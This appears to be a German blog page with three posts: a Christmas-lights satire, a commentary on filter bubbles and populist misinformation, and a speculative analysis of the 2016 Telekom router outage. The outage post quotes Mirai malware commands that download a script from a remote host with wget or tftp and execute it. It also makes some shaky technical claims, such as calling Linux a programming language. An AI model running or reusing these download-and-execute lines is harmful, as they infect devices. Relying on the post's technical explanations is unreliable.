Quelle: http://de.gofreedownload.net/free-vector/vector-christmas/free-christmas-themed-sketchy-vector-graphics-pack-67375/
http://de.gofreedownload.net/free-vector/vector-Quelle: christmas/free-christmas-themed-sketchy-vector-graphics-pack-67375/

Wer nicht pünktlich zum 1. Advent eine Fichte oder mindestens eine Kirschlorbeerhecke  im Vorgarten mit einer 200 LED Lichterkette als ernsthafte Konkurrenz zur kommunalen Straßenbeleuchtung ausgestattet hat, muss damit rechnen, tags darauf zum empörten Gesprächsthema an der Wursttheke zu avancieren. Eine vorweihnachtliche  „Challenge“, wie man heutzutage inoffizielle Wettkämpfe von bisweilen derber Sinnlosigkeit nennt, hat die Saarländer jäh aus ihrer Lethargie entfesselt.

Schlehdorn Walter aus der Friedhofsgasse, ehemaliges Grubenrind und autodidaktischer Schwenker- Bastler, legt mit seiner Dachrinnen- Mobilkonstruktion die Messlatte für die Beleuchtungskonkurrenz gewaltig hoch an. Ein beleuchteter Schlitten samt 8 Rentieren aus selbst geflochtenem Schießdraht rollt die 10 Meter lange Hausfront, angetrieben von einem ausgebauten Waschmaschinenmotor, entlang. Der modifizierte Schleudergang des einstigen Haushaltsgeräts katapultiert das Gefährt am Ende seiner Fahrt zum Ausgangspunkt zurück, sodass man das etwa 2 Meter lange Lichtobjekt mit einem tieffliegenden Kometen verwechseln könnte. Den Bremsmechanismus hat der ambitionierte Bergmannskumpel noch nicht ausgereift perfektionieren können, was Zweifel daran aufkommen lässt, dass sein Konstrukt bis zum Heiligabend durchhalten wird.

Nachbar Schmitt Ewald war selbstverständlich nicht untätig und mit investigativer Energie, welche er seit seiner Pensionierung als Steuerbeamter in keiner Weise verlernt hat, konnte er sich seit Juli auf das Projekt des Kontrahenten vorbereiten. In diesem Jahr soll mit ausgefeilter Computertechnik der monströsen Mechanik aus der unmittelbaren Nachbarschaft effektiv entgegen gewirkt werden. Jede seiner insgesamt 1200 Dachziegel hat er mit einer Multicolorleuchtdiode bestückt, welche einzeln per Funksignal angesteuert werden können. Im Wechsel der frequenzabhängigen Tonhöhe des Weihnachtsliedes „Oh Tannenbaum“ erleuchtet rhythmisch und in Farbe die zur Straße um 38 Grad geneigte Dachfläche, sodass er sich hierfür eigens eine Feuerwerksgenehmigung der Klasse 2 von der zuständigen Gemeindeverwaltung einholen musste.

Etwas gediegener, allerdings nicht weniger aufwendig will Großfamilie Kannengießer der weihnachtlichen Vorfreude begegnen. Sie bewohnen mit 3 Generationen und insgesamt 13 Einzelpersonen das mehrstöckige Gebäude am Ende der Gasse. Es handelt sich um ein landestypisches Doppelhaus, wobei beide Fronthälften nach architektonischer Präzision vollkommen gleich auszusehen scheinen. Die ungewöhnlich vielen, allerdings auch putzig kleinen Fenster können praktischerweise wie eine zweistellige Digitalanzeige zweckentfremdet werden. Mit ebenso vielen Zeitschaltuhren werden eigens angebrachte Leuchtelemente in den Fensterrahmen so gesteuert, dass in korrekter Kombination der jeweilige Kalendertag als Gesamtkunstwerk die Hauswand schmückt.

Weniger ambitioniert gibt sich der bekennende Langzeitarbeitslose Müller Erwin, indem er einen Ring Lyoner schlicht mit 4 Bierflaschen ziert. Jeden Adventssonntag öffnet er ein Pils und prostet genüsslich den Nachbarn zu, welche in Unverständnis kopfschüttelnd vom Fenster verschwinden, sobald sie sich entdeckt fühlen.

Als vor 8 Jahren zugezogener, ehemaliger Pfälzer hat es der Klostermann Manfred ungleich schwerer, seine durchaus vorbildlichen Integrationsbemühungen erfolgreich voranbringen zu können. Mit einer Flutlichtkonstruktion provozierte er im vergangenen Jahr einen kollektiven Besuch von Mitarbeitern der Flugsicherung und des Bundesgrenzschutzes. Es führte zur abrupten Disqualifikation im vorweihnachtlichen „Contest“ und zu Abzügen in der B- Note durch den Vorstand des Heimatvereins beim Frühschoppen nach dem Hochamt. Sozusagen „gelb vorbelastet“, aber keineswegs entmutigt, trägt sein Engagement endlich die erhofften Früchte. Sichtlich beeindruckt registriert die kritische Nachbarschaft seine imposante Beamer- Projektion von Fußballergebnissen in Echtzeit beginnend mit der Kreisliga bis zur Bundesliga. Die fensterlose linke Hauswand eignet sich hervorragend als Projektionsfläche, während 5 speziell dafür gepflanzte Douglastannen als dezente Umrandung eine räumliche Wirkung ausstrahlen.

Das Saarland ist bestens vorbereitet, Weihnachten kann kommen. Wie begegnet ihr eigentlich dieser alljährlichen Herausforderung?

 

Share Button

Reise in die Filterblase

Share Button

Der Begriff „Filterblase“ könnte durchaus für eine Nominierung zum Unwort des Jahres avancieren. Gemeint ist damit sozusagen ein virtueller, ideologisch abgeschirmter Käfig, der maßgeblich durch (a)soziale Netze im Internet verfügbar gemacht wird. Die Möglichkeit, sich zum Beispiel als Facebook- Nutzer seine virtuelle Umgebung, abgesehen von den Werbeeinblendungen, nach eigenen Vorstellungen zu gestalten, birgt die Gefahr, sich gegen Informationsquellen, welche man durch Vorurteile bzw. durch die eigene Gesinnung missbilligt, abzuschotten. Da es in der menschlichen Natur liegt, eigene Vorlieben, Sichtweisen und Dogmen gegenüber anderen Ansichten vorzuziehen, fällt manchen Leuten der Blick über den Tellerrand schwer.

Die eigenen Idole müssen schon heftig viel Mist bauen, damit man wieder Bodenhaftung zurück erlangt, um halbwegs objektiv Sachverhalte einschätzen zu können. Wer hat nicht in Erwartung auf ein tolles Musikerlebnis, das Album seines Pop- Idols ungehört gekauft? Welcher Fan eines Fußballstars hat noch nicht unrühmliche Auftritte seines Idols abseits des Stadions entschuldigend relativiert? Hingegen neigt der Mensch dazu, jeden noch so kleinen Fehltritt von als Gegnern wahrgenommenen Leuten hoch zu stilisieren.

Der Weg in die eigene Filterblase gelingt schnell und man merkt es nicht einmal. Im politischen Geschehen scheinen die Folgen dieser Entwicklung längst Früchte zu tragen. Populismus erfährt eine fatale Renaissance.

filterblase1

Als Meister dieser Disziplin erweisen sich Politiker, die auf jede Situation eine einfache sowie mundgerechte Antwort wissen, wie die AFD- Politikerin Beatrix von Storch es stets mit spitzfindigen Twitter- Perlen praktiziert.

Obdachlose bekommen sehr wohl Obdach, wenn sie sich nur ansatzweise darum bemühen würden. Flüchtlinge müssen sich auch entsprechend registrieren lassen. Die Behörden sammeln nicht die Leute von der Straße, weder Flüchtlinge noch Obdachlose. Und es gibt durchaus Obdachlose, die Mobiltelefone besitzen. Die Aussagen von Frau von Storch sind schlichtweg falsch und befeuern lediglich Hass und Hetze von Leuten, die ohnehin sich Flüchtlinge als Feindbild ausgewählt haben. Auf konkrete Kausalzusammenhänge wird verzichtet.

filterblase2

Filterblasenbewohner des rechtspopulistischen Territoriums glauben in gehorsamer Naivität jeden Blödsinn. Dass Herr Elsässer postfaktischen Blödsinn erzählt, spielt keine Rolle. Gerne begibt man sich auch in die bemitleidenswerte Opferrolle. Das Linksextreme generell mit gleichen Strategien kämpfen, soll nicht verschwiegen werden.

filterblase3

Wie funktioniert nun die Propaganda in einer solchen Filterblase? Wer sich seine Filterblase zusammengebastelt hat, bekommt weitgehend Informationen aus diesen ausgewählten Quellen. Der Fall über angeblich katastrophale Zustände in Münchner Kliniken durch Migranten ist ein hervorragendes Beispiel für Meinungsmanipulation. Es existieren oft mehrere Quellen, die über den gleichen Vorfall berichteten, allerdings sich gegenseitig als Quellen angaben. Die Geschichte war erlogen, aber man wollte der Story einen seriösen Eindruck verschaffen, indem man auf einen tschechischen TV- Sender verwies. Tatsächlich gab es ein YouTube- Video dazu, aber der angebliche Sender findet man nicht in der offiziellen Senderliste der tschechischen Rundfunkanstalten. Es handelt sich um einen privaten YouTube- Kanal, der sich als Fernsehsender inszeniert. Nachfragen bei diversen Münchner Kliniken konnten bestätigen, dass der geschilderte Fall frei erfunden war und diese Ärztin nie dort gearbeitet hatte.

Nicht immer sind die Meldungen so offensichtlich falsch, manchmal besitzen sie sogar einen wahren Kern, der aber nach der eigenen Vorstellung passend zurecht gerückt wird. Das darf man übrigens auch anderen, als zuweilen seriös geltenden Medien vorwerfen. Auch diese verfolgen gelegentlich eine tendenziös wirkende Berichterstattung. So war es ziemlich auffällig, dass im US- Wahlkampf Donald Trump erheblich schlechtere Publicity aus der deutschen Presselandschaft bekam als Kontrahentin Hillary Clinton.  Es gibt eben nicht nur eine Filterblase…

 

 

Share Button

Cyberwar oder einfach nur technisches Versagen?

Share Button

OK, ich lehne mich mit meiner Ansicht über die massive Telekom- Störung vom 27. November 2016 ziemlich weit aus dem spekulativen Fenster. Bei dieser Störung handelt es sich um den Ausfall von etwa 900000 Internetanschlüssen von ausschließlich Telekom- Kunden.

Quelle: Telekom
Quelle: Telekom

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat sich zu einem gewagten Statement hinreißen lassen:

Das BSI ordnet diesen Ausfall einem weltweiten Angriff auf ausgewählte Fernverwaltungsports von DSL-Routern zu. Dieser erfolgte, um die angegriffenen Geräte mit Schadsoftware zu infizieren. Diese Angriffe wurden auch in dem vom BSI geschützten Regierungsnetz registriert, in dem sie aber auf Grund funktionierender Schutzmaßnahmen folgenlos blieben.

Ich glaube nicht, dass ein Hackerangriff für den Ausfall von Routermodellen ausschließlich des Typs Speedport und nur bei der Telekom verantwortlich ist/war.

Was spricht gegen diese Theorie, womit übrigens bereits kräftig politisch Kapital daraus geschlagen und gleichzeitig das technische Versagen der Telekom verschleiert wird?

1. Es existierte eine Störungsmeldung der Telekom bereits vor bzw. parallel zu der prominenteren, wo über 900000 Kunden betroffen sind/waren. Die Störmeldung lautet wörtlich:

„Automatische Routerkonfiguration funktioniert teilweise nicht“.

Quelle: Telekom
Quelle: Telekom

Es wurde also versucht, automatisch Änderungen an der Konfiguration vorzunehmen, wie das z.B. bei Firmware- Updates üblich ist, wenn der Kunde den Zugang hierfür auf seinem Router geöffnet hat. Das muss jetzt nichts mit der Folgestörung zu tun haben, wäre aber plausibel für den Fall, dass die neu eingespielte Firmware fehlerhaft gewesen sein sollte.

2. Angenommen, es wäre tatsächlich ein Cyber- Angriff auf jene Speedport- Routermodelle mit einer entsprechenden Sicherheitslücke der Grund für die massenhaften Ausfälle, wäre das aus Sicht der Angreifer doch eher sinnlos. Cyber- Kriminelle würden sich ja selbst das eigene Ziel für ihre Aktionen versperren, indem sie diese Internetanschlüsse quasi abschalten. Das ergibt eigentlich keinen Sinn.

3. Die von der Telekom eingeleiteten Maßnahmen zur Problemlösung in Form eines Konfigurationsupgrades deuten eher darauf hin, dass ein typischer Konfigurationsfehler behoben werden soll, als dass eine augenscheinlich bekannte Sicherheitslücke geschlossen werden soll. Würde nur eine Sicherheitslücke geschlossen werden, würde man damit nicht unbedingt auch wieder die Internetverbindung herstellen.

4. Schaut man sich die Kommentare diverser betroffener Telekom- Kunden an, so konnten viele das Problem lösen, indem sie ihre Endgeräte manuell auf einen anderen DNS- Server eingestellt haben (z.B. 8.8.8.8 von Google). Da diese Leute danach erfolgreich das Internet über den angeblich manipulierten Router und dessen womöglich fehlerhafter DNS- Konfiguration nutzen konnten, ist das ein erhebliches Indiz dafür, dass schlicht ein Konfigurationsfehler im Router zu bemängeln wäre. Das könnte z.B. spekulativ, aber plausibel darauf zurückzuführen sein, dass ein automatisches Router- Update fehl schlug und dabei eine falsche Adresse des Telekom- DNS- Servers eingetragen wurde. Dieser Lösungsansatz, der ja auch nachweislich bei vielen Leuten funktionierte, würde die Theorie eines Cyber- Angriffs deutlich schwächen.

5. In der Telekom- Störungsmeldung wird außerdem berichtet, dass man den Hersteller des Routers in die Fehlerbeseitigung involviert hat. Wären Modelle anderer Hersteller ebenfalls betroffen, hätte man nicht von einem Hersteller (im Singular) gesprochen, was man bei solchen Cyber- Angriffen durchaus erwarten müsste. Durch die bisher allerdings spärlich vorhandenen Informationen deutet alles eher darauf hin, dass die besagten Routermodelle womöglich lapidar durch ein automatisches Update lahm gelegt wurden. Die Zahl von etwa 900000 betroffenen Geräten deutet wiederum darauf hin, dass zwar viele Anschlüsse betroffen waren, aber lange nicht alle, die diese Routermodelle verwenden. Das kann eventuell damit zu erklären sein, dass eben nicht alle Router für ein automatisches Upgrade freigeschaltet waren/sind. Da müsste man jetzt Feedback von Telekom- Kunden bekommen, die mit den gleichen Routermodellen eben nicht vom Ausfall betroffen gewesen sind und ob tatsächlich die automatische Updatefunktion abgeschaltet ist. (Immerhin einen solchen Telekom- Kunden kenne ich persönlich.)

6. Befasst man sich mit der vom BSI propagierten Sicherheitslücke näher, klingt deren Schlussfolgerung keineswegs plausibel. Man sieht das TR-069 Protokoll, welches für Fernwartungszwecke für Kunden- Router eingesetzt wird, als potentielle Sicherheitslücke und auch im aktuellen Fall verantwortlich für die massenhaften Ausfälle. Die Kommunikation erfolgt über den Port 7547, was aber nicht zwingend sein muss.

Hierzu existiert ein offizielles Statement der Telekom auf eine entsprechende Kundenanfrage aus dem Jahr 2014, als die Sicherheitslücke des TR-069 Protokolls publiziert wurde:https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

Quelle: https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

 

Genau genommen müssten die Hacker demnach eher die Management- Server der entsprechenden Provider angreifen, um tatsächlich Zugriff auf betroffenen Router zu erlangen. Der Aufwand in Bezug auf den zu erwartenden Nutzen wäre gering.  Es ist nicht ungewöhnlich, dass im Internet Ports gescannt werden und der Port 7547 (TR-069 bzw. TR-064) bildet keine ungewöhnliche Ausnahme. Der Angreifer müsste sich nach dieser These einen Remote- Zugang auf einen schwach geschützten Kunden- Router verschaffen, um dann wiederum eine Kommunikation zum Provider- Management- Server herstellen zu können. Dann müsste der Angreifer schließlich noch die Sicherheitshürden des entsprechenden Management- Servers überwinden, um schließlich Zugriff auf alle Kunden- Router, die die Fernwartungsschnittstelle geöffnet haben, zugreifen zu können. Das wäre unter Umständen mit viel Aufwand und Glück möglich, würde aber absolut keinen Sinn ergeben, indem man nach diesem Aufwand einfach nur die Kunden- Router vom Netz trennt und damit auch den eigenen Zugriff darauf unterbindet.

7. Und schließlich wäre es allein aus Analysezwecken interessant und wichtig gewesen, an betroffenen Anschlüssen mal andere Routermodelle zu verwenden, ob dadurch der Fehler hätte behoben werden können. Darüber schweigt man sich aus, denn es würde nachweisen, dass der Cyber- Angriff erfunden wäre. Andere Routermodelle verwenden ebenfalls jene Fernwartungsschnittstelle. Wieso waren absolut keine anderen Router als jene Speedport- Modelle betroffen?

Wie dem auch sei, mir kommt als jemand, der sich ein wenig mit IT- Technik auskennt, diese Geschichte ziemlich suspekt vor.

Zwischenzeitlich verbreitet sich die Nachricht, dass tatsächlich eine schlecht programmierte Malware gezielt DSL- Router mit der inzwischen als verantwortlich erklärten Sicherheitslücke für die Ausfälle zuständig gewesen sein soll.

Würde sich nur ein einziger Telekom- Kunde melden, dessen Speedport- Router nicht jene Easy- Support Funktion eingeschaltet hatte und auch nicht betroffen gewesen wäre, würde die Telekom in Erklärungsnot geraten. Denn betroffene Telekom- Kunden, die durch Änderung des DNS- Server- Eintrages im Router das Problem selbst lösen konnten, mussten ja hingegen vom Zugriff von außen schließlich betroffen gewesen sein. Wenn also beide Fälle nachzuweisen wären, wäre die Cyber- Attacke als Erklärung recht dürftig.

Update 29.11.2016

 

telekom_stoerung4atelekom_stoerung4btelekom_stoerung4ctelekom_stoerung4d

 

 

 

 

 

 

 

 

Für den Fall, dass doch tatsächlich ein Hacker- Angriff der Auslöser für diese Großstörung der Telekom gewesen sein sollte, muss man der Telekom grobe Fahrlässigkeit unterstellen.

Wie erwähnt, hat man die Telekom bereits 2014 auf diese mögliche Schwachstelle hingewiesen. Jedoch hat die Telekom diesen Hinweis nicht ernst genommen bzw. sogar ignoriert. Es wurde versichert, dass nur der Telekom- Server Zugriff per „Easy Support“ herstellen könnte…

Ein Auszug aus dem Code des berüchtigten Mirai- Virus:

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh

`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`

`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`

Grob gefasst, wird an das Gerät über einen Port, der nach außen, also in Richtung Internet, offen sein muss, eine entsprechende Anfrage gestellt. Das soll über den Port 7547 geschehen sein, der augenscheinlich für die Fernwartung von Seiten der Telekom für Speedport- Router standardmäßig geöffnet ist.

Das genügt jedoch nicht, um Befehle auszuführen. Hierfür muss natürlich vorher eine Authentifizierung erfolgen, ob die Remote- Anfrage auch berechtigt ist, Zugriff zu erhalten. Das scheint ja immerhin bei 900000 Routern der Telekom dann mit Erfolg praktiziert worden zu sein. Das Virus bedient sich dabei einem recht simplen Verfahren, indem es einfach der Reihe nach typische Standardpasswörter probiert. Danach können dann Befehle ausgeführt werden, die wie oben Daten nachladen, Berechtigungen von Dateien ändern usw.

Demnach wäre auch die Aussage auf die Frage im Jahr 2014 falsch, dass ausschließlich eine Verbindung zu einem Management- Server der Telekom über das TR-069 Protokoll möglich wäre.

Update 30.11.2016:

Die Anzeichen für einen Cyber- Angriff haben sich verdichtet. IT- Experten, allerdings nicht von der Telekom, haben den Angriff analysiert. Demnach war es kein gezielter Angriff durch russische Cyber- Soldaten, wie es zwischenzeitlich in den Medien propagiert wurde, sondern eben die übliche Prozedur von Internet- Kriminellen, welche Schwachstellen in der IoT- Umgebung (Internet of Things) permanent absuchen.

Die leider nicht geschlossenen Sicherheitslücken waren schließlich ausschlaggebend für das erfolgreiche Infizieren der Malware, welche wohl ein Derivat des berüchtigten Mirai- Virus war.

Die Speedport- Router waren auch nicht abgestürzt, sondern nur funktional eingeschränkt, da ja einige Telekom- Kunden durch das Ändern der DNS- Einträge auf den Endgeräten den Router immerhin noch als DSL- Modem verwenden konnten.

Die Aussagen von Seiten der Telekom bzw. des BSI, dass die Malware schlecht programmiert gewesen sein soll und dadurch nicht das eigentliche Ziel erreichte, sind falsch. Tatsächlich konnte die Malware nicht die Router- Software manipulieren, weil die Betriebssystem- Routinen nicht kompatibel mit der Programmiersprache (Linux) der Malware waren. Das deutet darauf hin, dass es definitiv kein gezielter Cyber- Angriff auf die Telekom- Infrastruktur gewesen sein kann.

Share Button

Der kritische Blick auf Politik und Zeitgeschehen